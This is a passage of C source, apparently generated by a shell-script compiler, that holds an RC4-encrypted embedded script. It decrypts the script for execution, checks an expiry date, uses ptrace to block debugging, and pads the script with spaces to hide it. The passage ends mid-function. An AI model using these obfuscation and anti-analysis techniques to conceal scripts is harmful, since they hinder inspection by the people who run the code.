	"\152\143\242\135\011\222\243\122\055\146\263\341\310\067\265\300"
	"\321\154\174\212\126\140\073\070\052\015\174\123\217\107\354\004"
	"\076\350\326\351\040\361\233\217\212\337\072\155\120\263\342\355"
	"\205\105\047\307\324\014\256\030\273\022\153\171\033\012\000\146"
	"\351\206\057\054\135\074\351\203\107\123\375\212\027\036\364\171"
	"\256\107\340\323\223\335\142\010\205\261\214\000\367\041\160\053"
	"\057\311\356\347\005\032\025\263\156\166\264\104\113\042\046\302"
	"\031\142\235\000\017\377\340\003\156\042\035\246\263\061\135\062"
	"\211\242\340\073\342\206\202\233\276\304\335\223\057\032\334\224"
	"\212\221\066\070\232\207\244\203\215\341\153\015\152\167\254\072"
	"\170\367\327\177\253\264\372\150\044\252\340\125\111\062\052\270"
	"\133\047\074\053\005\015\370\171\214\377\152\077\253\172\325\200"
	"\115\227\114\071\040\337\210\365\124\014\210\047\027\300\175\211"
	"\060\334\212\102\104\337\361\331\271\261\312\232\021\374\016\111"
	"\067\037\011\103\015\117\302\002\376\310\251\015\236\363\001\174"
	"\022\103\314\200\176\030\245\147\040\172\311\340\206\354\341\347"
	"\026\237\054\254\050\077\243\255\327\147\223\376\046\121\371\343"
	"\021\302\357\376\055\300\325\357\354\032\013\277\163\332\366\170"
	"\323\377\061\016\144\345\007\054\300\053\040\116\143\366\200\146"
	"\211\305\301\043\210\360\040\164\231\063\343\143\120\317\106\343"
	"\234\011\045\355\171\345\041\150\307\146\062\131\074\264\053\166"
	"\052\241\124\246\007\233\076\235\175\014\073\204\300\375\375\351"
	"\372\313\260\330\071\273\336\005\331\254\334\025\157\216\205\000"
	"\036\201\112\176\062\173\244\342\316\207\142\375\036\130\235\312"
	"\165\140\245\020\147\104\147\273\133\036\247\201\266\145\146\215"
	"\000\017\370\236\152\337\315\116\303\256\176\125\304\253\254\042"
	"\303\046\123\262\351\334\144\347\214\136\060\021\334\076\355\112"
	"\141\124\127\271\106\341\074\202\155\127\176\362\223\001\355\335"
	"\310\172\317\116\316\320\217\343\336\212\273\006\000\235\011\155"
	"\254\201\260\355\241\057\020\343\270\135\322\107\340\240\233\204"
	"\202\117\223\222\107\266\310\224\372\101\316\203\272\107\014\202"
	"\050\277\153\315\104\354\341\110\333\044\226\124\021\076\147\155"
	"\165\220\225\160\223\116\155\236\273\177\151\120\024\025\145\256"
	"\330\270\366\073\270\070\157\342\065\221\252\107\040\122\170\001"
	"\171\347\066\345\017\364\022\125\117\175\313\155\365\026\053\122"
	"\176\174\276\274\047\217\211\041\034\334\117\130\346\351\163\323"
	"\134\166\240\374\053\324\207\102\111\213\126\131\107\267\221\100"
	"\334\276\333\014\260\263\220\243\247\246\234\254\203\322\136\250"
	"\033\033\272\317\165\035\160\106\076\011\375\337\041\171\127\302"
	"\143\345\034\226\325\127\043\074\077\037\055\041\223\035\351\136"
	"\025\014\232\017\126\052\207\316\014\336\323\251\356\045\063\363"
	"\375\263\274\134\152\037\177\226\215\265\053\153\107\315\057\160"
	"\231\020\337\012\051\064\163\024\107\070\216\340\247\336\373\274"
	"\366\251\361\237\261\264\251\132\112\355\173\145\235\331\152\043"
	"\202\054\264\052\143\057\276\332\227\242\035\002\076\077\071\347"
	"\321\025\323\045\207\176\104\250\334\120\240\131\327\074\010\374"
	"\256\175\160\360\122\125\071\122\303\225\124\120\245\132\156\066"
	"\234\113\320\344\033\163\267\201\362\216\232\332\117\355\127\145"
	"\377\064\257\312\377\147\140\123\123\125\060\061\325\374\217\102"
	"\164\160\271\201\233\131\042\117\133\222\012\065\267\003\275\056"
	"\255\323\327\340\040\023\002\041\271\300\122\333\227\254\040\322"
	"\145\247\164\014\247\200\307\365\053\056\146\122\304\210\011\356"
	"\316\342\012\273\163\317\126\304\246\053\351\176\141\046\221\210"
	"\336\362\132\301\022\254\220\365\123\114\207\020\245\100\157\054"
	"\067\127\054\375\154\160\061\234\331\014\352\077\171\365\115\220"
	"\104\353\022\070\030\203\122\354\024\133\104\164\146\030\150\173"
	"\066\344\040\277\301\311\172\056\211\235\267\164\053\300\027\303"
	"\065\153\050\241\050\112\346\101\241\374\022\151\233\024\353\175"
	"\011\020\016\015\044\206\334\333\376\304\073\164\045\015\242\061"
	"\051\265\103\044\126\262\130\320\057\010\052\020\245\363\320\223"
	"\322\300\336\340\024\002\116\026\224\207\160\177\312\036\165\015"
	"\205\074\135\274\274\071\332\071\223\175\177\366\313\060\116\317"
	"\215\103\075\332\234\251\161\307\115\360\230\135\361\304\307\024"
	"\305\164\013\022\242\022\337\210\357\242\330\032\115\145\034\274"
	"\371\076\353\255\166\356\072\211\015\313\226\365\346\352\305\247"
	"\141\234\360\046\340\203\115\144\303\240\010\017\312\152\335\017"
	"\032\313\023\363\272\120\010\271\054\336\005\362\253\062\137\271"
	"\115\030\367\363\120\151\141\376\016\300\246\213\226\315\226\347"
	"\105\366\253\000\124\355\016\236\125\004\371\171\235\017\143\113"
	"\132\365\003\166\237\260\270\322\374\161\041\262\054\073\225\227"
	"\133\160\107\242\062\024\237\273\215\014\336\373\106\354\010\305"
	"\143\215\230\322\223\304\105\167\065\223\333\231\203\135\263\064"
	"\124\272\123\053\342\344\334\002\013\170\363\102\202\367\034\366"
	"\031\351\131\324\120\256\025\140\324\206\310\003\342\254\311\140"
	"\154\122\337\102\033\220\350\150\016\105\120\200\233\074\245\256"
	"\154\021\036\374\362\254\207\265\341\126\220\151\014\041\164\127"
	"\265\063\342\113\114\063\200\257\066\317\313\327\031\171\251\254"
	"\361\146\361\350\204\367\165\307\235\042\031\013\050\215\002\052"
	"\254\031\077\034\201\245\151\325\320\067\320\263\365\334\121\054"
	"\172\277\275\361\176\265\316\233\001\110\300\063\155\211\221\347"
	"\160\156\101\050\310\171\254\070\252\341\313\062\141\347\272\301"
	"\213\005\140\315\255\057\036\151\101\173\061\017\241\131\050\117"
	"\135\033\167\266\272\026\335\350\347\176\254\126\044\317\325\132"
	"\357\364\240\021\046\300\155\264\115\057\111\324\372\357\366\042"
	"\136\160\350\242\042\065\100\015\344\170\130\102\307\365\177\231"
	"\044\227\345\273\354\006\361\234\277\350\377\035\154\377\376\366"
	"\232\237\030\272\074\375\256\224\214\241\030\074\155\165\104\314"
	"\141\327\174\104\060\200\336\124\300\032\204\141\071\315\243\275"
	"\236\141\233\120\122\150\332\131\276\025\200\325\044\064\123\164"
	"\002\247\247\021\027\342\272\136\052\266\024\035\347\075\334\370"
	"\321\060\332\327\212\031\220\052\240\103\165\053\154\271\200\044"
	"\030\215\110\224\366\043\034\371\036\042\274\163\171\350\176\007"
	"\071\324\205\265\320\131\170\023\023\025\075\056\061\172\137\105"
	"\010\156\065\175\276\335\072\104\140\026\234\136\100\335\032\110"
	"\136\367\350\164\026\332\006\315\325\045\172\302\241\205\354\275"
	"\141\016\017\344\206\046\124\221\315\364\266\204\146\001\215\172"
	"\303\315\351\070\075\055\060\233\305\355\375\073\132\014\061\221"
	"\375\270\373\103\261\273\026\076\132\355\302\340\040\341\057\261"
	"\117\154\101\062\044\234\300\070\011\151\321\362\102\356\075\211"
	"\052\174\072\072\057\036\054\127\256\063\315\056\377\010\023\214"
	"\161\046\045\237\056\170\156\315\240\346\325\333\225\133\177\332"
	"\201\161\054\161\025\243\245\355\107\173\310\173\135\253\163\163"
	"\051\227\062\062\077\311\137\105\244\226\135\140\346\364\276\234"
	"\355\343\117\167\113\154\061\016\375\237\006\150\335\167\272\060"
	"\312\337\144\101\325\045\243\371\041\161\055\332\330\200\244\064"
	"\334\037\131\273\157\005\261\043\304\234\043\027\077\335\254\320"
	"\302\366\107\150\070\010\152\221\131\302\336\376\033\021\222\215"
	"\315\147\277\256\341\116\034\012\315\215\130\275\250\145\313\162"
	"\313\060\076\245\270\262\124\230\157\144\163\150\167\016\062\307"
	"\266\163\134\040\051\344\230\043\160\053\177\262\040\034\046\006"
	"\070\107\374\020\167\307\234\305\162\372\365\104\113\152\267\266"
	"\013\062\246\104\223\223\237\023\152\100\271\041\024\351\315\142"
	"\101\263\216\242\316\317\166\005\344\236\255\153\070\116\263\125"
	"\131\115\024\173\231\013\100\243\344\342\005\063\070\323\007\025"
	"\063\356\214\277\131\163\174\166\346\243\300\026\304\307\041\133"
	"\025\244\164\074\122\340\356\346\263\211\204\103\135\152\071\320"
	"\225\074\375\257\224\050\336\377\073\304\317\217\141\244\114\211"
	"\124\336\062\333\350\014\252\333\257\113\151\356\244\007\303\156"
	"\265\370\351\361\134\215\171\111\262\112\103\166\325\037\367\360"
	"\256\015\130\070\340\114\312\054\170\273\064\255\046\274\211\173"
	"\335\252\340\170\045\362\343\314\225\056\346\131\331\141\267\004"
	"\357\260\154\056\322\325\260\005\245\151\242\015\212\220\304\166"
	"\116\173\076\167\374\075\053\170\120\267\150\164\071\012\025\301"
	"\053\111\042\101\377\037\243\011\161\257\117\145\232\112\230\216"
	"\147\004\134\324\111\176\122\326\302\011\074\250\076\177\120\372"
	"\020\026\323\202\312\262\045\240\016\041\217\126\262\104\231\000"
	"\012\134\007\155\312\340\235\317\115\261\266\264\240\265\111\202"
	"\224\336\203\047\333\075\326\132\364\104\113\154\266\314\120\343"
	"\266\127\040\304\136\112\032\025\234\131\072\232\211\342\270\102"
	"\304\356\337\336\227\305\232\035\065\251\300\273\006\113\253\040"
	"\065\353\236\153\362\213\212\261\063\201\300\070\202\263\057\375"
	"\022\040\320\133\146\076\224\012\024\036\065\341\056\072\375\226"
	"\262\340\330\376\175\013\216\011\314\253\377\255\152\263\255\335"
	"\152\165\003\050\162\077\376\045\275\240\327\364\231\066\273\103"
	"\066\002\104\314\211\234\156\312\277\374\056\014\315\372\052\130"
	"\100\354\005\126\311\316\375\114\204\334\172\364\074\143\044\012"
	"\026\270\254\227\005\131\040\313\274\210\203\356\301\312\047\052"
	"\327\340\005\122\272\361\232\373\246\036\340\270\150\315\261\001"
	"\307\224\034\032\377\052\066\132\235\237\220\106\347\124\141\210"
	"\033\261\240\035\326\336\076\222\172\241\036\325\207\031\277\363"
	"\243\263\134\020\331\243\271\166\165\350\014\021\230\271\077\134"
	"\210\351\320\172\023\200\103\132\063\050\357\273\246\341\013\002"
	"\211\302\366\173\076\026\142\227\117\252\020\004\025\015\006\013"
	"\336\047\247\151\257\130\023\245\125\244\245\132\215\140\014\245"
	"\207\036\013\014\011\227\352\017\073\160\323\303\124\162\365\114"
	"\053\244\226\246\312\077\203\130\005\053\354\251\171\364\247\137"
	"\347\073\003\017\256\370\205\062\122\343\242\100\303\214\030\020"
	"\235\131\300\177\370\154\032\125\226\146\110\072\055\247\035\130"
	"\217\024\111\203\035\225\167\267\254\061\112\243\353\112\035\310"
	"\226\266\106\275\313\174\214\176\320\174\022\132\335\107\077\027"
	"\046\200\004\215\331\065\105\155\061\126\344\273\356\067\057\337"
	"\220\034\141\250\014\377\217\302\011\102\103\326\253\166\166\065"
	"\041\310\163\324\007\131\337\007\337\061\036\305\214\021\273\322"
	"\307\346\237\033\243\151\051\360\225\163\323\115\256\072\330\002"
	"\204\316\221\240\315\143\320\352\370\215\217\210\330\231\067\377"
	"\374\004\017\207\025\052\001\255\040\106\210\167\014\306\156\125"
	"\205\056\100\240\015\336\260\371\030\176\246\063\315\060\216\351"
	"\042\163\333\104\076\156\022\250\176\325\120\274\217\101\127\307"
	"\357\111\304\012\135\036\221\205\351\137\312\361\022\225\004\315"
	"\247\320\374\172\263\326\025\357\231\047\156\036\264\316\107\155"
	"\053\176\267\004\151\147\061\173\354\255\322\156\217\101\350\071"
	"\027\230\153\366\303\234\054\132\230\314\225\351\315\130\134\042"
	"\332\174\221\362\372\133\240\272\266\353\122\055\247\056\126\137"
	"\073\247\046\022\167\017\042\351\115\167\075\250\371\116\100\317"
	"\134\074\254\273\247\200\127\132\071\214\142\066\302\153\173\331"
	"\110\042\175\342\306\072\222\360\337\250\232\035\012\155\035\261"
	"\247\263\114\037\225\222\042\315\065\131\131\223\366\024\355\032"
	"\076\022\134\007\343\334\120\257\312\032\135\124\331\263\266\155"
	"\100\270\100\036\201\276\122\131\303\100\362\252\200\271\322\071"
	"\276\212\306\242\335\073\127\366\066\140\077\000\342\176\046\230"
	"\071\377\160\032\360\200\023\252\237\246\273\072\112\023\126\231"
	"\136\121\304\044\361\307\140\365\224\166\155\050\161\052\237\275"
	"\301\134\104\272\010\222\365\130\227\076\056\274\140\274\047\102"
	"\006\363\044\322\304\276\223\065\060\334\211\236\214\004\150\042"
	"\047\330\375\363\267\100\012\240\335\005\237\042\032\056\125\056"
	"\327\326\303\142\143\135\237\303\227\342\054\154\200\251\130\240"
	"\145\325\124\256\153\047\337\155\173\041\142\373\135\327\045\121"
	"\254\026\035\014\262\175\033\111\331\003\320\103\310\111\341\215"
	"\051\321\254\342\167\120\226\202\373\155\061\246\357\122\072\212"
	"\233\376\365\215\261\017\256\252\244\361\072\103\111\031\266\250"
	"\336\025\034\124\303\357\177\340\036\311\055\107\326\363\036\221"
	"\253\023\360\272\115\060\115\017\234\372\143\142\270\004\324\310"
	"\174\260\267\053\302\144\020\242\233\116\264\213\201\023\375\161"
	"\001\032\131\170\053\155\140\351\115\043\014\341\335\364\243\311"
	"\170\125\262\167\310\006\204\141\011\134\247\350\055\300\021\200"
	"\005\103\173\262\246\253\112\243\065\374\370\306\363\015\065\075"
	"\322\130\250\346\156\221\367\101\376\230\327\364\300\301\145\216"
	"\254\131\263\234\062\164\345\054\140\165\071\124\340\304\056\364"
	"\344\267\206\073\264\022\111\040\356\353\115\204\041\105\136\220"
	"\116\151\337\050\152\000\275\164\263\331\110\000\340\362\175\025"
	"\022\230\155\221\257\031\114\104\140\310\122\116\321\300\052\064"
	"\065\173\136\120\234\356\004\155\254\056\331\166\002\101\235\236"
	"\316\126\041\116\313\243\047\332\323\304\232\226\142\050\050\171"
	"\014\011\031\214\351\261\227\005\036\107\367\011\365\264\037\014"
	"\236\340\065\177\113\222\066\034\263\016\073\105\065\234\146\335"
	"\342\145\307\216\173\100\012\117\302\046\044\372\145\014\164\071"
	"\323\172\134\200\252\307\220\216\265\325\200\352\273\320\150\007"
	"\015\207\214\334\177\172\313\024\327\042\064\242\073\031\376\022"
	"\336\143\263\014\075\303\227\367\151\010\162\143\317\264\266\025"
	"\111\031\132\336\234\153\044\335\145\321\212\103\372\021\103\264"
	"\023\330\031\054\077\336\202\074\063\267\132\245\310\273\145\250"
	"\251\005\143\220\146\361\257\145\134\151\360\033\024\163\314\006"
	"\223\005\221\214\276\234\221\134\210\325\256\315\223\204\164\275"
	"\256\230\270\254\336\274\170\064\323\305\046\163\011\155\326\033"
	"\156\352\067\303\336\352\370\175\370\150\212\106\127\356\332\014"
	"\070\235\235\344\155\075\042\277\374\272\305\262\274\052\131\015"
	"\016\205\137\203\354\241\223\135\054\232\111\150\225\375\157\365"
	"\300\347\374\342\255\233\230\161\366\175\066\014\111\025\305\266"
	"\170\263\354\212\032\206\137\176\037\232\002\264\060\036\107\273"
	"\031\312\056\070\012\235\076\171\112\271\055\004\340\111\377\105"
	"\142\041\133\173\066\350\151\353\345\345\144\060\353\112\336\356"
	"\076\300\131\231\317\166\174\051\305\311\306\252\016\216\304\324"
	"\367\377\336\233\107\323\270\304\072\207\271\162\107\303\124\136"
	"\311\211\054\241\214\301\156\316\346\364\133\205\072\034\270\245"
	"\142\103\157\060\210\056\007\350\153\021\252\153\120\026\146\157"
	"\026\247\366\241\131\357\224\067\071\307\377\014\000\361\270\241"
	"\301\204\140\052\054\206\156\153\044\013\023\121\366\206\376\151"
	"\107\032\237\051\053\016\226\065\334\070\222\306\164\051\236\372"
	"\102\360\220\261\204\317\132\042\223\014\020\177\355\365\034\225"
	"\166\355\047\315\110\172\112\373\243\317\165\127\134\031\323\051"
	"\076\206\367\200\044\316\173\271\070\345\003\023\107\217\223\051"
	"\352\204\212\355\000\352\031\215\267\057\204\374\144\264\360\120"
	"\117\157\142\354\010\260\245\370\204\042\156\324\114\161\075\362"
	"\165\314\062\255\347\034\352\143\337\360\267\261\246\003\063\354"
	"\150\221\320\146\176\320\265\334\375\160\210\170\126\355\276\116"
	"\243\021\262\126\132\021\371\124\320\032\243\315\270\161\116\373"
	"\260\205\047\355\226\347\173\135\357\336\346\246\242\262\044\234"
	"\325\106\067\211\320\135\273\000\307\065\334\301\105\270\177\206"
	"\241\351\160\122\070\346\021\207\065\156\275\155\373\110\343\226"
	"\067\177\043\210\155\042\064\161\331\345\341\261\036\142\046\107"
	"\176\244\360\251\045\337\371\026\262\234\275\104\265\053\131\331"
	"\372\063\373\254\112\331\115\254\233\323\257\312\152\061\050\254"
	"\203\173\256\067\020\024\220\005\017\033\217\254\162\307\066\136"
	"\314\253\014\047\336\314\213\016\305\220\160\300\367\334\132\062"
	"\306\153\304\061\226\146\306\164\125\231\337\105\113\034\063\227"
	"\110\177\070\300\072\063\255\360\123\061\255\011\171\121\000\322"
	"\100\274\365\133\065\307\243\313\276\103\374\227\252\144\037\026"
	"\043\262\356\067\047\301\112\330\102\367\010\377\233\246\251\016"
	"\331\371\306\321\162\215\317\033\236\347\257\164\260\206\372\313"
	"\350\323\357\023\231\026\075\346\010\272\244\100\174\151\255\214"
	"\256\207\247\317\205\250\103\045\142\001\177\032\243\002\275\363"
	"\120\236\201\031\217\253\252\237\221\135\145\113\003\207\356\027"
	"\135\070\262\046\227\035\014\160\304\107\037\051\217\344\045\211"
	"\100\043\233\205\057\104\212\115\346\153\220\142\203\344\041\113"
	"\175\042\045\055\117\110\262\243\235\267\373\235\236\044\175\074"
	"\056\323\376\001\360\154\113\243\313\345\312\145\204\067\107\016"
	"\260\336\301\272\316\102\271\351\366\130\011\163\270\063\055\316"
	"\113\271\020\353\031\335\053\240\264\367\275\060\327\034\064\332"
	"\140\053\060\310\232\036\310\260\007\316\027\115\353\054\332\024"
	"\125\337\151\071\303\250\204\201\332\355\347\040\007\241\344\045"
	"\357\312\356\212\350\267\072\360\206\122\075\161\177\030\206\325"
	"\367\357\016\273\227\222\074\162\177\044\222\207\306\166\254\266"
	"\100\233\100\051\123\173\032\331\315\130\113\115\161\321\042\151"
	"\301\060\044\131\302\141\313\102\206\135\311\114\324\166\002\025"
	"\021\103\077\144\276\132\076\214\262\212\331\044\133\373\215\035"
	"\054\262\166\356\024\101\061\232\237\372\346\163\160\351\211\202"
	"\054\310\347\353\043\046\170\325\260\121\372\014\115\207\051\172"
	"\072\237\150\116\340\232\350\177\224\317\363\005\270\174\210\344"
	"\105\160\320\150\226\110\076\106\232\070\122\350\300\173\142\372"
	"\033\313\111\373\145\061\173\372\001\157\000\271\354\210\236\061"
	"\370\156\232\217\266\331\325\121\022\050\071\323\244\233\316\277"
	"\146\027\273\313\110\067\305\111\246\305\003\222\116\241\304\107"
	"\020\137\326\307\071\253\030\113\324\121\037\170\354\355\067\122"
	"\004\363\036\114\052\344\226\321\252\232\143\370\073\050\100\114"
	"\207\026\023\300\302\053\014\226\174\053\016\151\030\106\274\034"
	"\072\332\151\144\276\000\065\151\232\231\141\326\301\241\042\111"
	"\270\065\011\172\140\026\021\335\101\040\106\131\146\002\166\241"
	"\335\337\005\234\340\073\005\172\325\147\120\226\011\163\337\301"
	"\250\351\073\011\377\115\346\100\155\055\232\323\060\021\164\015"
	"\361\172\252\321\266\257\113\213\026\234\042\037\017\001\340\270"
	"\352\034\301\352\151\250\053\326\325\305\252\006\327\037\023\310"
	"\232\276\231\121\155\345\334\204\202\376\243\222\000\204\112\353"
	"\241\014\325\013\264\000\342\212\306\214\220\235\254\244\145\107"
	"\142\377\230\317\344\164\123\147\163\367\371\163\174\103\136\035"
	"\120\064\051\004\064\013\216\372\230\037\230\105\303\375\214\046"
	"\375\044\366\342\231\112\111\015\101\102\201\276\206\337\334\326"
	"\024\005\333\110\020\152\103\250\211\333\355\115\331\171\163\326"
	"\236\152\270\070\264\002\105\366\104\306\264\313\246\220\242\272"
	"\225\175\003\246\350\107\116\161\042\074\277\374\266\063\323\124"
	"\235\214\215\121\216\322\110\323\231\374\237\077\215\101\372\043"
	"\277\375\311\247\104\027\031\147\124\330\144\012\014\067\137\251"
	"\303\354\373\121\277\104\045\130\101\304\230\316\005\222\361\305"
	"\220\272\154\325\322\206\075\046\137\242\061\153\331\220\025\235"
	"\174\021\357\073\125\024\223\226\330\054\145\336\277\127\243\120"
	"\022\020\046\344\227\143\013\366\005\074\142\337\314\170\175\111"
	"\211\154\204\337\201\030\166\131\104\333\070\004\062\334\124\104"
	"\355\172\051\204\336\065\173\344\161\336\304\076\126\101\207\340"
	"\255\014\277\056\044\065\210\151\021\301\155\103\235\302\210\213"
	"\074\261\017\033\347\213\377\131\151\303\227\300\005\037\240\262"
	"\053\140\341\120\226\151\272\247\052\050\353\310\352\163\123\047"
	"\045\143\102\014\356\102\145\130\006\375\031\013\035\271\276\110"
	"\032\237\231\260\011\123\127\064\174\102\374\146\266\117\215\334"
	"\263\320\350\242\022\116\372\031\114\024\044\151\316\343\262\350"
	"\202\113\230\213\237\360\277\033\063\274\202\352\014\020\306\277"
	"\340\257\141\363\376\134\014\112\160\061\263\076\024\145\046\227"
	"\261\277\043\121\260\343\155\343\237\357\316\253\377\224\152\340"
	"\103\313\324\102\050\341\214\230\023\100\327\047\246\376\277\130"
	"\276\342\251\156\305\026\122\145\005\040\020\005\264\173\346\370"
	"\106\272\072\157\233\307\007\256\007\337\326\256\335\226\006\233"
	"\170\257\011\076\306\134\243\313\174\263\321\061\056\267\051\165"
	"\162\144\345\016\054\354\275\063\314\223\342\251\051\350\104\242"
	"\230\116\341\136\252\204\052\047\070"
#define      pswd_z	256
#define      pswd	((&data[11447]))
	"\263\202\335\046\346\302\064\022\257\361\106\173\205\050\044\257"
	"\021\151\121\251\270\062\371\073\241\143\113\153\246\322\273\010"
	"\135\154\172\260\172\226\104\072\161\135\272\010\157\334\207\004"
	"\135\000\235\322\144\227\016\006\372\131\161\240\054\054\251\211"
	"\231\043\072\024\272\176\116\053\333\011\064\113\345\273\120\103"
	"\274\356\025\040\205\044\046\200\176\230\040\252\305\312\064\136"
	"\356\157\163\250\355\302\324\311\313\010\025\260\304\146\363\200"
	"\124\011\241\332\055\310\132\253\140\173\126\045\105\213\204\063"
	"\372\367\334\350\271\261\262\204\272\307\065\176\055\050\377\202"
	"\061\240\134\137\150\266\013\311\062\141\356\167\354\162\253\347"
	"\152\210\317\044\071\201\250\363\111\335\162\166\006\161\371\070"
	"\022\125\227\173\014\242\104\076\004\062\266\361\245\141\330\020"
	"\352\250\064\043\051\335\027\162\273\211\351\301\373\342\372\015"
	"\070\221\210\105\064\314\204\071\377\072\053\245\234\004\265\206"
	"\254\352\252\326\307\301\110\203\113\062\105\106\025\077\124\116"
	"\321\334\223\006\251\030\077\251\122\153\116\357\157\004\166\034"
	"\356\040\362\266\341\073\071\055\156\176\163\203\276\307\322\217"
	"\244\146\225\115\176\325\007\142\267\061\211\357\055\342\127\341"
	"\144\064\007\112\366\074\135\245\055\244\040\262\315\105\142\336"
#define      rlax_z	1
#define      rlax	((&data[11729]))
	"\254"
#define      lsto_z	1
#define      lsto	((&data[11730]))
	"\366"
#define      opts_z	1
#define      opts	((&data[11731]))
	"\204"
#define      inlo_z	3
#define      inlo	((&data[11732]))
	"\272\101\320"
#define      shll_z	10
#define      shll	((&data[11737]))
	"\232\031\044\361\156\301\173\306\106\074\170\303\330\345"
#define      msg1_z	42
#define      msg1	((&data[11749]))
	"\116\316\236\173\256\354\247\351\131\211\201\322\321\054\355\372"
	"\022\043\071\032\307\211\363\270\267\010\163\352\070\305\124\212"
	"\337\122\360\245\304\355\122\051\125\006\265\102"
#define      tst2_z	19
#define      tst2	((&data[11797]))
	"\264\034\127\223\113\164\003\304\037\040\321\366\306\253\033\013"
	"\264\336\351\264\023\257\024\313\013\033\062"
#define      date_z	1
#define      date	((&data[11820]))
	"\325"
#define      chk1_z	22
#define      chk1	((&data[11823]))
	"\036\135\135\242\056\362\265\326\201\123\132\231\114\257\123\127"
	"\061\233\261\357\352\201\317\327\206"
#define      xecc_z	15
#define      xecc	((&data[11846]))
	"\011\362\035\342\002\214\044\255\106\307\224\257\027\262\312"
#define      tst1_z	22
#define      tst1	((&data[11861]))
	"\124\050\131\276\336\361\103\334\374\154\350\075\011\052\017\134"
	"\144\304\026\263\233\221"
#define      msg2_z	19
#define      msg2	((&data[11883]))
	"\141\066\172\312\041\022\232\375\021\205\046\221\307\370\104\164"
	"\140\111\336\342"/* End of data[] */;
#define      hide_z	4096
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	0	/* Define as 1 to enable ptrace the executable */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask  = (unsigned long)&chkenv;
	mask ^= (unsigned long)getpid() * ~mask;
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

#if !defined(TRACEABLE)

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
#	define PTRACE_ATTACH	PT_ATTACH
#endif
void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PTRACE_ATTACH, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !defined(TRACEABLE) */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];

	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	ret = chkenv(argc);
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
